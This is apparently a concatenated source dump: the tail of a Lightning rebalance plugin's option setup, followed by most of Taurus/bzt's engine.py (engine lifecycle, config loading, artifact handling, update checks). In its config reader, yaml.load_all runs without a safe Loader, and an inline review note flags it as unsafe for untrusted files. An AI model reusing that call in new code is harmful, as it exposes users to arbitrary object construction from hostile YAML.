    # getroute_switch maps the option string to the actual route-search callable.
    plugin.getroute = getroute_switch(options.get("rebalance-getroute"))
    plugin.rebalanceall_msg = None
    plugin.log(f"Plugin rebalance initialized with {plugin.fee_base} base / {plugin.fee_ppm} ppm fee "
               f"cltv_final:{plugin.cltv_final} "
               f"maxhops:{plugin.maxhops} "
               f"msatfactor:{plugin.msatfactor} "
               f"erringnodes:{plugin.erringnodes} "
               f"getroute: {plugin.getroute.__name__}")
# Register the plugin's configurable options before entering the main loop.
# Options must be declared prior to plugin.run() so lightningd learns about
# them during the getmanifest handshake; values are consumed in init() above.
plugin.add_option(
    "rebalance-getroute",
    "iterative",
    "Getroute method for route search can be 'basic' or 'iterative'."
    "'basic': Tries all routes sequentially. "
    "'iterative': Tries shorter and bigger routes first.",
    "string"
)
plugin.add_option(
    "rebalance-maxhops",
    "5",
    "Maximum number of hops for `getroute` call. Set to 0 to disable. "
    "Note: Two hops are added for own nodes input and output channel. "
    "Note: Routes with a 8 or more hops have less than 3% success rate.",
    "string"
)
plugin.add_option(
    "rebalance-msatfactor",
    "4",
    "Will instruct `getroute` call to use higher requested capacity first. "
    "Note: This will decrease to 1 when no routes can be found.",
    "string"
)
plugin.add_option(
    "rebalance-erringnodes",
    "5",
    "Exclude nodes from routing that raised N or more errors. "
    "Note: Use 0 to disable.",
    "string"
)
# Blocks forever, dispatching JSON-RPC requests from lightningd.
plugin.run()
|
engine.py | """
Main BZT classes
Copyright 2015 BlazeMeter Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import codecs
import copy
import datetime
import hashlib
import json
import logging
import math
import os
import pkgutil
import re
import shutil
import sys
import threading
import time
import traceback
import uuid
from abc import abstractmethod
from collections import namedtuple, defaultdict
from distutils.version import LooseVersion
from json import encoder
import yaml
from yaml.representer import SafeRepresenter
import bzt
from bzt import ManualShutdown, get_configs_dir, TaurusConfigError, TaurusInternalException, InvalidTaurusConfiguration
from bzt import ToolError
from bzt.requests_model import RequestParser
from bzt.six import numeric_types, string_types, text_type, PY2, UserDict, parse, reraise
from bzt.utils import PIPE, shell_exec, get_full_path, ExceptionalDownloader, get_uniq_name, HTTPClient
from bzt.utils import load_class, to_json, BetterDict, ensure_is_dict, dehumanize_time, is_windows, is_linux
from bzt.utils import str_representer, Environment, RequiredTool
TAURUS_ARTIFACTS_DIR = "TAURUS_ARTIFACTS_DIR"
SETTINGS = "settings"
class Engine(object):
    """
    Core entity of the technology, used to coordinate whole process
    :type reporters: list[Reporter]
    :type services: list[Service]
    :type log: logging.Logger
    :type aggregator: bzt.modules.aggregator.ConsolidatingAggregator
    :type stopping_reason: BaseException
    """
    # strftime pattern used to name per-run artifact directories
    ARTIFACTS_DIR = "%Y-%m-%d_%H-%M-%S.%f"
    def __init__(self, parent_logger):
        """
        :type parent_logger: logging.Logger
        """
        self.file_search_paths = []
        self.services = []
        self.__artifacts = []
        self.reporters = []
        self.artifacts_dir = None
        self.log = parent_logger.getChild(self.__class__.__name__)
        self.env = Environment(self.log)  # backward compatibility
        self.shared_env = Environment(self.log)  # backward compatibility
        self.config = Configuration()
        self.config.log = self.log.getChild(Configuration.__name__)
        self.modules = {}  # available modules
        self.provisioning = Provisioning()
        self.aggregator = Aggregator(is_functional=False)
        self.interrupted = False
        self.check_interval = 1
        self.stopping_reason = None
        self.engine_loop_utilization = 0
        # modules that completed prepare()/startup() -- drive shutdown/post_process
        self.prepared = []
        self.started = []
        self.default_cwd = None
        # hooks installed by CLI to lower/raise console log verbosity during run
        self.logging_level_down = lambda: None
        self.logging_level_up = lambda: None
        self._http_client = None
    def configure(self, user_configs, read_config_files=True):
        """
        Load configuration files
        :type user_configs: list[str]
        :type read_config_files: bool
        """
        self.log.info("Configuring...")
        if read_config_files:
            self._load_base_configs()
        merged_config = self._load_user_configs(user_configs)
        all_includes = []
        # loop because included configs may themselves declare "included-configs"
        while "included-configs" in self.config:
            includes = self.config.pop("included-configs")
            included_configs = [self.find_file(conf) for conf in includes if conf not in all_includes + user_configs]
            all_includes += includes
            self.config.load(included_configs)
        self.config['included-configs'] = all_includes
        self.config.merge({"version": bzt.VERSION})
        self.get_http_client()
        if self.config.get(SETTINGS).get("check-updates", True):
            install_id = self.config.get("install-id", self._generate_id())
            def wrapper():
                return self._check_updates(install_id)
            thread = threading.Thread(target=wrapper)  # intentionally non-daemon thread
            thread.start()
        return merged_config
    def unify_config(self):
        """Normalize config shape: execution as list, reporters/services/modules as dicts."""
        executions = self.config.get(ScenarioExecutor.EXEC, [])
        if isinstance(executions, dict):
            executions = [executions]
        self.config[ScenarioExecutor.EXEC] = executions
        settings = self.config.get(SETTINGS)
        default_executor = settings.get("default-executor", None)
        prov_type = self.config.get(Provisioning.PROV)
        for execution in executions:
            # force_set writes the default back into the execution dict (BetterDict)
            executor = execution.get("executor", default_executor, force_set=True)
            if not executor:
                msg = "Cannot determine executor type and no default executor in %s"
                raise TaurusConfigError(msg % execution)
        reporting = self.config.get(Reporter.REP, [])
        for index in range(len(reporting)):
            ensure_is_dict(reporting, index, "module")
        services = self.config.get(Service.SERV, [])
        for index in range(len(services)):
            ensure_is_dict(services, index, "module")
        modules = self.config.get("modules")
        for module in modules:
            ensure_is_dict(modules, module, "class")
    @staticmethod
    def _generate_id():
        """Build an anonymous install id: CI/host-type prefix plus MAC-derived node id."""
        if os.getenv("JENKINS_HOME"):
            prefix = "jenkins"
        elif os.getenv("TRAVIS"):
            prefix = "travis"
        elif any([key.startswith("bamboo") for key in os.environ.keys()]):
            prefix = "bamboo"
        elif os.getenv("TEAMCITY_VERSION"):
            prefix = "teamcity"
        elif os.getenv("DOCKER_HOST"):
            prefix = "docker"
        elif os.getenv("AWS_"):
            # NOTE(review): checks an env var literally named "AWS_", which normally
            # doesn't exist; likely meant any var with the "AWS_" prefix -- confirm
            prefix = "amazon"
        elif os.getenv("GOOGLE_APPLICATION_CREDENTIALS") or os.getenv("CLOUDSDK_CONFIG"):
            prefix = "google_cloud"
        elif os.getenv("WEBJOBS_NAME"):
            prefix = "azure"
        elif is_linux():
            prefix = 'linux'
        elif is_windows():
            prefix = 'windows'
        else:
            prefix = 'macos'
        return "%s-%x" % (prefix, uuid.getnode())
    def prepare(self):
        """
        Prepare engine for work, will call preparing of Provisioning and add
        downstream EngineModule instances
        """
        self.log.info("Preparing...")
        self.unify_config()
        interval = self.config.get(SETTINGS).get("check-interval", self.check_interval)
        self.check_interval = dehumanize_time(interval)
        try:
            self.__prepare_aggregator()
            self.__prepare_services()
            self.__prepare_provisioning()
            self.__prepare_reporters()
            self.config.dump()
        except BaseException as exc:
            self.stopping_reason = exc
            raise
    def _startup(self):
        """Call startup() on every module, recording each as started beforehand."""
        modules = self.services + [self.aggregator] + self.reporters + [self.provisioning]  # order matters
        for module in modules:
            self.log.debug("Startup %s", module)
            # append before startup() so a failing module still gets shutdown()
            self.started.append(module)
            module.startup()
        self.config.dump()
    def start_subprocess(self, args, env, cwd=None, **kwargs):
        """Spawn a child process with the given Environment, defaulting cwd to the engine's."""
        if cwd is None:
            cwd = self.default_cwd
        return shell_exec(args, cwd=cwd, env=env.get(), **kwargs)
    def run(self):
        """
        Run the job. Calls `startup`, does periodic `check`,
        calls `shutdown` in any case
        """
        self.log.info("Starting...")
        exc_info = exc_value = None
        try:
            self._startup()
            self.logging_level_down()
            self._wait()
        except BaseException as exc:
            self.log.debug("%s:\n%s", exc, traceback.format_exc())
            if not self.stopping_reason:
                self.stopping_reason = exc
            exc_value = exc
            exc_info = sys.exc_info()
        finally:
            self.log.warning("Please wait for graceful shutdown...")
            try:
                self.logging_level_up()
                self._shutdown()
            except BaseException as exc:
                self.log.debug("%s:\n%s", exc, traceback.format_exc())
                if not self.stopping_reason:
                    self.stopping_reason = exc
                # keep the first exception; shutdown errors only fill the gap
                if not exc_value:
                    exc_value = exc
                    exc_info = sys.exc_info()
        if exc_value:
            # reraise preserves the original traceback (six helper)
            reraise(exc_info, exc_value)
    def _check_modules_list(self):
        """Poll check() on started modules; return True when any reports finished."""
        stop = False
        modules = [self.provisioning, self.aggregator] + self.services + self.reporters  # order matters
        for module in modules:
            if module in self.started:
                self.log.debug("Checking %s", module)
                finished = bool(module.check())
                if finished:
                    self.log.debug("%s finished", module)
                    stop = finished
        return stop
    def _wait(self):
        """
        Wait modules for finish
        :return:
        """
        prev = time.time()
        while not self._check_modules_list():
            now = time.time()
            diff = now - prev
            delay = self.check_interval - diff
            self.engine_loop_utilization = diff / self.check_interval
            self.log.debug("Iteration took %.3f sec, sleeping for %.3f sec...", diff, delay)
            if delay > 0:
                time.sleep(delay)
            prev = time.time()
            if self.interrupted:
                raise ManualShutdown()
        self.config.dump()
    def _shutdown(self):
        """
        Shutdown modules
        :return:
        """
        self.log.info("Shutting down...")
        self.log.debug("Current stop reason: %s", self.stopping_reason)
        exc_info = exc_value = None
        modules = [self.provisioning, self.aggregator] + self.reporters + self.services  # order matters
        for module in modules:
            try:
                if module in self.started:
                    module.shutdown()
            except BaseException as exc:
                self.log.debug("%s:\n%s", exc, traceback.format_exc())
                if not self.stopping_reason:
                    self.stopping_reason = exc
                # remember only the first failure; keep shutting the rest down
                if not exc_value:
                    exc_value = exc
                    exc_info = sys.exc_info()
        self.config.dump()
        if exc_value:
            reraise(exc_info, exc_value)
    def post_process(self):
        """
        Do post-run analysis and processing for the results.
        """
        self.log.info("Post-processing...")
        # :type exception: BaseException
        exc_info = exc_value = None
        modules = [self.provisioning, self.aggregator] + self.reporters + self.services  # order matters
        # services are last because of shellexec which is "final-final" action
        for module in modules:
            if module in self.prepared:
                try:
                    module.post_process()
                except BaseException as exc:
                    if isinstance(exc, KeyboardInterrupt):
                        self.log.debug("post_process: %s", exc)
                    else:
                        self.log.debug("post_process: %s\n%s", exc, traceback.format_exc())
                    if not self.stopping_reason:
                        self.stopping_reason = exc
                    if not exc_value:
                        exc_value = exc
                        exc_info = sys.exc_info()
        self.config.dump()
        if exc_info:
            reraise(exc_info, exc_value)
    def create_artifact(self, prefix, suffix):
        """
        Create new artifact in artifacts dir with given prefix and suffix
        :type prefix: str
        :type suffix: str
        :return: Path to created file
        :rtype: str
        :raise TaurusInternalException: if no artifacts dir set
        """
        if not self.artifacts_dir:
            raise TaurusInternalException("Cannot create artifact: no artifacts_dir set up")
        filename = get_uniq_name(self.artifacts_dir, prefix, suffix, self.__artifacts)
        self.__artifacts.append(filename)
        self.log.debug("New artifact filename: %s", filename)
        return filename
    def existing_artifact(self, filename, move=False, target_filename=None):
        """
        Add existing artifact, it will be collected into artifact_dir. If
        move=True, the original file will be deleted
        :type filename: str
        :type move: bool
        :type target_filename: str
        """
        self.log.debug("Add existing artifact (move=%s): %s", move, filename)
        if self.artifacts_dir is None:
            self.log.warning("Artifacts dir has not been set, will not copy %s", filename)
            return
        new_filename = os.path.basename(filename) if target_filename is None else target_filename
        new_name = os.path.join(self.artifacts_dir, new_filename)
        self.__artifacts.append(new_name)
        if get_full_path(filename) == get_full_path(new_name):
            self.log.debug("No need to copy %s", filename)
            return
        if not os.path.exists(filename):
            self.log.warning("Artifact file not exists: %s", filename)
            return
        if move:
            self.log.debug("Moving %s to %s", filename, new_name)
            shutil.move(filename, new_name)
        else:
            self.log.debug("Copying %s to %s", filename, new_name)
            shutil.copy(filename, new_name)
    def create_artifacts_dir(self, existing_artifacts=(), merged_config=None):
        """
        Create directory for artifacts, directory name based on datetime.now()
        """
        if not self.artifacts_dir:
            artifacts_dir = self.config.get(SETTINGS, force_set=True).get("artifacts-dir", self.ARTIFACTS_DIR)
            self.artifacts_dir = datetime.datetime.now().strftime(artifacts_dir)
        self.artifacts_dir = get_full_path(self.artifacts_dir)
        self.log.info("Artifacts dir: %s", self.artifacts_dir)
        # exported so child tools/scripts can find the artifacts location
        os.environ[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
        if not os.path.isdir(self.artifacts_dir):
            os.makedirs(self.artifacts_dir)
        # dump current effective configuration
        dump = self.create_artifact("effective", "")  # TODO: not good since this file not exists
        self.config.set_dump_file(dump)
        self.config.dump()
        # dump merged configuration
        if merged_config:
            merged_config.dump(self.create_artifact("merged", ".yml"), Configuration.YAML)
            merged_config.dump(self.create_artifact("merged", ".json"), Configuration.JSON)
        for artifact in existing_artifacts:
            self.existing_artifact(artifact)
    def is_functional_mode(self):
        """True when the configured aggregator runs in functional (non-load) mode."""
        return self.aggregator is not None and self.aggregator.is_functional
    def __load_module(self, alias):
        """
        Load module class by alias
        :param alias: str
        :return: class
        """
        if alias in self.modules:
            return self.modules[alias]
        mod_conf = self.config.get('modules')
        if alias not in mod_conf:
            msg = "Module '%s' not found in list of available aliases %s" % (alias, sorted(mod_conf.keys()))
            raise TaurusConfigError(msg)
        settings = ensure_is_dict(mod_conf, alias, "class")
        # deep-copy before masquerading so real settings keep their secrets
        acopy = copy.deepcopy(settings)
        BetterDict.traverse(acopy, Configuration.masq_sensitive)
        self.log.debug("Module config: %s %s", alias, acopy)
        err = TaurusConfigError("Class name for alias '%s' is not found in module settings: %s" % (alias, settings))
        clsname = settings.get('class', err)
        self.modules[alias] = load_class(clsname)
        if not issubclass(self.modules[alias], EngineModule):
            raise TaurusInternalException("Module class does not inherit from EngineModule: %s" % clsname)
        return self.modules[alias]
    def instantiate_module(self, alias):
        """
        Create new instance for module using its alias from module settings
        section of config. Thus, to instantiate module it should be mentioned
        in settings.
        :type alias: str
        :rtype: EngineModule
        """
        classobj = self.__load_module(alias)
        instance = classobj()
        assert isinstance(instance, EngineModule)
        instance.log = self.log.getChild(alias)
        instance.engine = self
        settings = self.config.get("modules")
        instance.settings = settings.get(alias)
        return instance
    def find_file(self, filename):
        """
        Try to find file or dir in search_path if it was specified. Helps finding files
        in non-CLI environments or relative to config path
        Return path is full and mustn't treat with abspath/etc.
        :param filename: file basename to find
        :type filename: str
        """
        if not filename:
            return filename
        if filename.lower().startswith("http://") or filename.lower().startswith("https://"):
            # remote resource: download into the artifacts dir and return local path
            parsed_url = parse.urlparse(filename)
            downloader = ExceptionalDownloader(self.get_http_client())
            self.log.info("Downloading %s", filename)
            tmp_f_name, headers = downloader.get(filename)
            cd_header = headers.get('Content-Disposition', '')
            dest = cd_header.split('filename=')[-1] if cd_header and 'filename=' in cd_header else ''
            # strip surrounding quotes from Content-Disposition filename
            if dest.startswith('"') and dest.endswith('"') or dest.startswith("'") and dest.endswith("'"):
                dest = dest[1:-1]
            elif not dest:
                dest = os.path.basename(parsed_url.path)
            fname, ext = os.path.splitext(dest) if dest else (parsed_url.hostname.replace(".", "_"), '.file')
            dest = self.create_artifact(fname, ext)
            self.log.debug("Moving %s to %s", tmp_f_name, dest)
            shutil.move(tmp_f_name, dest)
            return dest
        else:
            filename = os.path.expanduser(filename)  # expanding of '~' is required for check of existence
            # check filename 'as is' and all combinations of file_search_path/filename
            for dirname in [""] + self.file_search_paths:
                location = os.path.join(dirname, filename)
                if os.path.exists(location):
                    if dirname:
                        self.log.warning("Guessed location from search paths for %s: %s", filename, location)
                    return get_full_path(location)
        self.log.warning("Could not find location at path: %s", filename)
        return filename
    def _load_base_configs(self):
        """Discover and load system-wide and package-bundled base configs."""
        configs = []
        try:
            sys.path.insert(0, os.path.curdir)  # necessary for development mode (running bzt from curdir)
            configs.extend(self._scan_system_configs())
            configs.extend(self._scan_package_configs())
        finally:
            sys.path.pop(0)
        configs.sort(key=os.path.basename)
        self.log.debug("Base configs list: %s", configs)
        if not configs:
            self.log.warning("No base configs were discovered")
        self.config.load(configs)
    def _scan_package_configs(self):
        """Find configs advertised by installed packages via a 'bzt-configs.json' index file."""
        configs = []
        for importer, modname, ispkg in pkgutil.iter_modules(path=None):
            try:
                if not ispkg:
                    continue
                package_path = getattr(importer, 'path', None)
                if package_path is None:
                    continue
                index_path = os.path.join(package_path, modname, 'bzt-configs.json')
                if not os.path.exists(index_path):
                    continue
                try:
                    with codecs.open(index_path, 'rb', encoding='utf-8') as fds:
                        index_configs = json.load(fds)
                except (OSError, IOError, ValueError) as exc:
                    self.log.debug("Can't load package-specific bzt config %s: %s", index_path, exc)
                    continue
                if not isinstance(index_configs, list):
                    self.log.debug("Error: value of bzt-configs.json should be a list (%s)" % index_path)
                    continue
                for config_name in index_configs:
                    configs.append(os.path.join(importer.path, modname, config_name))
            except BaseException as exc:
                # a broken third-party package must not kill config discovery
                self.log.warning("Can't look for package configs in package %r: %s", modname, str(exc))
                self.log.debug("Traceback: %s", traceback.format_exc())
        return configs
    def _scan_system_configs(self):
        """Collect config files from the machine-wide configs directory, sorted by name."""
        configs = []
        machine_dir = get_configs_dir()  # can't refactor machine_dir out - see setup.py
        if os.path.isdir(machine_dir):
            self.log.debug("Reading system configs from: %s", machine_dir)
            for cfile in sorted(os.listdir(machine_dir)):
                fname = os.path.join(machine_dir, cfile)
                if os.path.isfile(fname):
                    configs.append(fname)
        return configs
    def _load_user_configs(self, user_configs):
        """
        :type user_configs: list[str]
        :rtype: Configuration
        """
        # "tab-replacement-spaces" is not documented 'cause it loads only from base configs
        # so it's sort of half-working last resort
        self.config.tab_replacement_spaces = self.config.get(SETTINGS).get("tab-replacement-spaces", 4)
        self.log.debug("User configs list: %s", user_configs)
        self.config.load(user_configs)
        # second load into a fresh Configuration yields the "merged" user view
        user_config = Configuration()
        user_config.log = self.log.getChild(Configuration.__name__)
        user_config.tab_replacement_spaces = self.config.tab_replacement_spaces
        user_config.warn_on_tab_replacement = False
        user_config.load(user_configs, self.__config_loaded)
        return user_config
    def __config_loaded(self, config):
        # each loaded config's directory becomes a file-search path for find_file()
        self.file_search_paths.append(get_full_path(config, step_up=1))
    def __prepare_provisioning(self):
        """
        Instantiate provisioning class
        """
        err = TaurusConfigError("Please check global config availability or configure provisioning settings")
        cls = self.config.get(Provisioning.PROV, err)
        self.provisioning = self.instantiate_module(cls)
        self.prepared.append(self.provisioning)
        self.provisioning.prepare()
    def __prepare_reporters(self):
        """
        Instantiate reporters, then prepare them in case they would like to interact
        """
        reporting = self.config.get(Reporter.REP, [])
        for index, reporter in enumerate(reporting):
            msg = "reporter 'module' field isn't recognized: %s"
            cls = reporter.get('module', TaurusConfigError(msg % reporter))
            instance = self.instantiate_module(cls)
            instance.parameters = reporter
            if self.__singletone_exists(instance, self.reporters):
                continue
            assert isinstance(instance, Reporter)
            self.reporters.append(instance)
        # iterate a copy since we remove while filtering
        for reporter in self.reporters[:]:
            if not reporter.should_run():
                self.reporters.remove(reporter)
        # prepare reporters
        for module in self.reporters:
            self.prepared.append(module)
            module.prepare()
    def __prepare_services(self):
        """
        Instantiate service modules, then prepare them
        """
        srv_config = self.config.get(Service.SERV, [])
        services = []
        for index, config in enumerate(srv_config):
            cls = config.get('module', '')
            instance = self.instantiate_module(cls)
            instance.parameters = config
            if self.__singletone_exists(instance, services):
                continue
            assert isinstance(instance, Service)
            services.append(instance)
        for service in services[:]:
            if not service.should_run():
                services.remove(service)
        self.services.extend(services)
        for module in self.services:
            self.prepared.append(module)
            module.prepare()
    def __singletone_exists(self, instance, mods_list):
        """
        :type instance: EngineModule
        :type mods_list: list[EngineModule]
        :rtype: bool
        """
        if not isinstance(instance, Singletone):
            return False
        for mod in mods_list:
            if mod.parameters.get("module") == instance.parameters.get("module"):
                msg = "Module '%s' can be only used once, will merge all new instances into single"
                self.log.warning(msg % mod.parameters.get("module"))
                mod.parameters.merge(instance.parameters)
                return True
        return False
    def __prepare_aggregator(self):
        """
        Instantiate aggregators
        :return:
        """
        cls = self.config.get(SETTINGS).get("aggregator", "")
        if not cls:
            self.log.warning("Proceeding without aggregator, no results analysis")
        else:
            self.aggregator = self.instantiate_module(cls)
        self.prepared.append(self.aggregator)
        self.aggregator.prepare()
    def get_http_client(self):
        """Lazily build the shared HTTPClient with proxy settings from config."""
        if self._http_client is None:
            self._http_client = HTTPClient()
            self._http_client.add_proxy_settings(self.config.get("settings").get("proxy"))
        return self._http_client
    def _check_updates(self, install_id):
        """Query gettaurus.org for a newer version; best-effort, never raises."""
        try:
            params = (bzt.VERSION, install_id)
            addr = "http://gettaurus.org/updates/?version=%s&installID=%s" % params
            self.log.debug("Requesting updates info: %s", addr)
            client = self.get_http_client()
            response = client.request('GET', addr, timeout=10)
            data = response.json()
            self.log.debug("Taurus updates info: %s", data)
            mine = LooseVersion(bzt.VERSION)
            latest = LooseVersion(data['latest'])
            if mine < latest or data['needsUpgrade']:
                msg = "There is newer version of Taurus %s available, consider upgrading. " \
                      "What's new: http://gettaurus.org/docs/Changelog/"
                self.log.warning(msg, latest)
            else:
                self.log.debug("Installation is up-to-date")
        except BaseException:
            self.log.debug("Failed to check for updates: %s", traceback.format_exc())
            self.log.warning("Failed to check for updates")
    def eval_env(self):
        """
        Should be done after `configure`
        """
        envs = self.config.get(SETTINGS, force_set=True).get("env", force_set=True)
        envs[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
        # first pass: expand $VAR references within declared env values
        for varname in envs:
            if envs[varname]:
                envs[varname] = str(envs[varname])
                envs[varname] = os.path.expandvars(envs[varname])
        # second pass: apply to the process environment (None means unset)
        for varname in envs:
            if envs[varname] is None:
                if varname in os.environ:
                    os.environ.pop(varname)
            else:
                os.environ[varname] = str(envs[varname])
        def custom_expandvars(value):
            # expand ${name} placeholders using the declared env mapping only
            parts = re.split(r'(\$\{.*?\})', value)
            value = ''
            for item in parts:
                if item and item.startswith("${") and item.endswith("}"):
                    key = item[2:-1]
                    if key in envs:
                        item = envs[key]
                if item is not None:
                    value += text_type(item)
            return value
        def apply_env(value, key, container):
            if isinstance(value, string_types):
                container[key] = custom_expandvars(value)
        # rewrite every string value in config with env placeholders expanded
        BetterDict.traverse(self.config, apply_env)
class Configuration(BetterDict):
    """
    loading both JSONs and YAMLs and .properties-like override
    dump effective config into files
    first config should not contain action prefixes
    """
    # format identifiers accepted by write()/dump()
    JSON = "JSON"
    YAML = "YAML"
    def __init__(self, *args, **kwargs):
        super(Configuration, self).__init__(*args, **kwargs)
        self.log = logging.getLogger('')
        self.dump_filename = None
        # >0 enables leading-tab-to-spaces repair when reading YAML files
        self.tab_replacement_spaces = 0
        self.warn_on_tab_replacement = True
    def load(self, config_files, callback=None):
        """
        Load and merge JSON/YAML files into current dict
        :type callback: callable
        :type config_files: list[str]
        """
        self.log.debug("Configs: %s", config_files)
        for config_file in config_files:
            try:
                configs = []
                with codecs.open(config_file, 'r', encoding='utf-8') as fds:
                    if self.tab_replacement_spaces:
                        contents = self._replace_tabs(fds.readlines(), config_file)
                    else:
                        contents = fds.read()
                self._read_yaml_or_json(config_file, configs, contents)
                for config in configs:
                    self.merge(config)
            except KeyboardInterrupt:
                raise
            except InvalidTaurusConfiguration:
                raise
            except BaseException as exc:
                # wrap any parse/IO failure into a user-facing config error
                raise TaurusConfigError("Error when reading config file '%s': %s" % (config_file, exc))
            if callback is not None:
                callback(config_file)
    def _read_yaml_or_json(self, config_file, configs, contents):
        """Parse contents as YAML, falling back to JSON when YAML fails and contents looks like JSON."""
        try:
            self.log.debug("Reading %s as YAML", config_file)
            # NOTE(review): yaml.load_all without an explicit Loader can construct
            # arbitrary objects; unsafe if config files come from untrusted sources
            yaml_documents = list(yaml.load_all(contents))
            for doc in yaml_documents:
                if doc is None:
                    continue
                if not isinstance(doc, dict):
                    raise InvalidTaurusConfiguration("Configuration %s is invalid" % config_file)
                configs.append(doc)
        except KeyboardInterrupt:
            raise
        except BaseException as yaml_load_exc:
            self.log.debug("Cannot read config file as YAML '%s': %s", config_file, yaml_load_exc)
            if contents.lstrip().startswith('{'):
                self.log.debug("Reading %s as JSON", config_file)
                config_value = json.loads(contents)
                if not isinstance(config_value, dict):
                    # NOTE(review): message typo "in invalid" (should read "is invalid")
                    raise InvalidTaurusConfiguration("Configuration %s in invalid" % config_file)
                configs.append(config_value)
            else:
                raise
    def set_dump_file(self, filename):
        """
        Set default file and format to be used by `dump` method
        :type filename: str
        """
        self.dump_filename = filename
    def write(self, fds, fmt):
        """
        Write config into opened file
        :type fds: file
        :type fmt: str
        :raise TaurusInternalException:
        """
        if fmt == self.JSON:
            json_s = to_json(self)
            fds.write(json_s.encode('utf-8'))
        elif fmt == self.YAML:
            yml = yaml.dump(self, default_flow_style=False, explicit_start=True, canonical=False, allow_unicode=True,
                            encoding='utf-8', width=float("inf"))
            fds.write(yml)
        else:
            raise TaurusInternalException("Unknown dump format: %s" % fmt)
        fds.write("\n".encode('utf-8'))
    def dump(self, filename=None, fmt=None):
        """
        Dump current state of dict into file. If no filename or format
        specified, defaults are used
        :type filename: str or NoneType
        :type fmt: str or NoneType
        """
        if not filename:
            filename = self.dump_filename
        if filename:
            if not fmt:
                # no format requested: dump both YAML and JSON variants
                self.dump(filename + ".yml", self.YAML)
                self.dump(filename + ".json", self.JSON)
                return
            # mask secrets and normalize non-JSON floats on a copy only
            acopy = copy.deepcopy(self)
            BetterDict.traverse(acopy, self.masq_sensitive)
            BetterDict.traverse(acopy, self.replace_infinities)
            with open(filename, "wb") as fhd:
                self.log.debug("Dumping %s config into %s", fmt, filename)
                acopy.write(fhd, fmt)
    @staticmethod
    def masq_sensitive(value, key, container):
        """
        Remove sensitive data from config
        """
        if isinstance(key, string_types):
            for suffix in ('password', 'secret', 'token',):
                if key.lower().endswith(suffix):
                    if value and isinstance(value, (string_types, text_type)):
                        container[key] = '*' * 8
    @staticmethod
    def replace_infinities(value, key, container):
        """
        Remove non-string JSON values used by default JSON encoder (Infinity, -Infinity, NaN)
        """
        del value
        if isinstance(container[key], float):
            if math.isinf(container[key]) or math.isnan(container[key]):
                container[key] = str(container[key])
    def _replace_tabs(self, lines, fname):
        """Replace leading tabs with spaces in YAML lines, warning once per offending line."""
        # NOTE(review): non-raw pattern string; '\S' is an invalid str escape
        # (DeprecationWarning on modern Python) -- prefer r"^( *)(\t+)( *\S*)"
        has_tab_indents = re.compile("^( *)(\t+)( *\S*)")
        res = ""
        for num, line in enumerate(lines):
            replaced = has_tab_indents.sub(r"\1" + (" " * self.tab_replacement_spaces) + r"\3", line)
            if replaced != line:
                line = replaced
                if self.warn_on_tab_replacement:
                    self.log.warning("Replaced leading tabs in file %s, line %s", fname, num)
                    self.log.warning("Line content is: %s", replaced.strip())
                    self.log.warning("Please remember that YAML spec does not allow using tabs for indentation")
            res += line
        return res
# Teach PyYAML to serialize our dict subclasses as plain mappings,
# and strings via the project's representer (block style for multiline).
yaml.add_representer(Configuration, SafeRepresenter.represent_dict)
yaml.add_representer(BetterDict, SafeRepresenter.represent_dict)
if PY2:
    yaml.add_representer(text_type, SafeRepresenter.represent_unicode)
yaml.add_representer(str, str_representer)
if PY2:
    # dirty hack from http://stackoverflow.com/questions/1447287/format-floats-with-standard-json-module
    encoder.FLOAT_REPR = lambda o: format(o, '.3g')
else:
    pass  # TODO: how to implement it?
class EngineModule(object):
    """
    Base class for any BZT engine module
    :type engine: Engine
    :type settings: BetterDict
    """
    def __init__(self):
        self.log = logging.getLogger('')
        self.engine = None  # injected by Engine.instantiate_module
        self.settings = BetterDict()  # module-level config from "modules" section
        self.parameters = BetterDict()  # per-usage config (execution/reporting item)
    def prepare(self):
        """
        Preparation stage, at which configuration is being read, configs
        and tools being prepared. All long preparations and checks should be
        made here, to make `startup` stage as fast as possible.
        """
        pass
    def startup(self):
        """
        Startup should be as fast as possible. Launch background processes,
        do some API calls for initiation of actual work. Consider making all
        checks and preparations on `prepare` stage.
        """
        pass
    def check(self):
        """
        Check if work should be finished
        :rtype: bool
        :return: True if should be finished
        """
        return False
    def shutdown(self):
        """
        Stop all processes that were started in `startup` stage.
        Should also be as fast as possible, deferring all long operations to
        `post_process` stage.
        """
        pass
    def post_process(self):
        """
        Do all possibly long analysis and processing on run results
        """
        pass
    def _should_run(self):
        """
        Returns True if provisioning matches run-at
        """
        # presumably exposed as the public should_run() by subclasses
        # (Engine filters reporters/services via should_run) -- confirm
        prov = self.engine.config.get(Provisioning.PROV)
        runat = self.parameters.get("run-at", None)
        if runat is not None and prov != runat:
            self.log.debug("Should not run because of non-matching prov: %s != %s", prov, runat)
            return False
        return True
class Provisioning(EngineModule):
    """
    Base class for any provisioning type. Provisioning is the way to
    get the resources that will run the job. For example, local provisoning
    means using local machine to run executors, remote means using
    remote machines with BZT API nodes on them.
    :type executors: list[ScenarioExecutor]
    """
    # config key under which the active provisioning alias is stored
    PROV = "provisioning"
    def __init__(self):
        super(Provisioning, self).__init__()
        self.executors = []
        # subclasses may allow empty execution (e.g. for pure-service runs)
        self.disallow_empty_execution = True
    def prepare(self):
        """
        Preparation in provisioning begins with reading executions list
        and instantiating ScenarioExecutor classes for them
        """
        super(Provisioning, self).prepare()
        exc = TaurusConfigError("No 'execution' is configured. Did you forget to pass config files?")
        executions = self.engine.config.get(ScenarioExecutor.EXEC, [])
        if not executions and self.disallow_empty_execution:
            raise exc
        for execution in executions:
            # "executor" is guaranteed present by Engine.unify_config()
            instance = self.engine.instantiate_module(execution.get("executor"))
            instance.provisioning = self
            instance.execution = execution
            assert isinstance(instance, ScenarioExecutor)
            self.executors.append(instance)
class FileLister(object):
    """
    A mixin to get required files info from executor
    """
    @abstractmethod
    def resource_files(self):
        """
        Get list of resource files
        :rtype: list
        """
        pass
class ScenarioExecutor(EngineModule):
    """
    Base class for executor modules that actually generate the load.

    :type provisioning: engine.Provisioning
    :type execution: BetterDict
    """
    RAMP_UP = "ramp-up"
    HOLD_FOR = "hold-for"
    CONCURR = "concurrency"
    THRPT = "throughput"
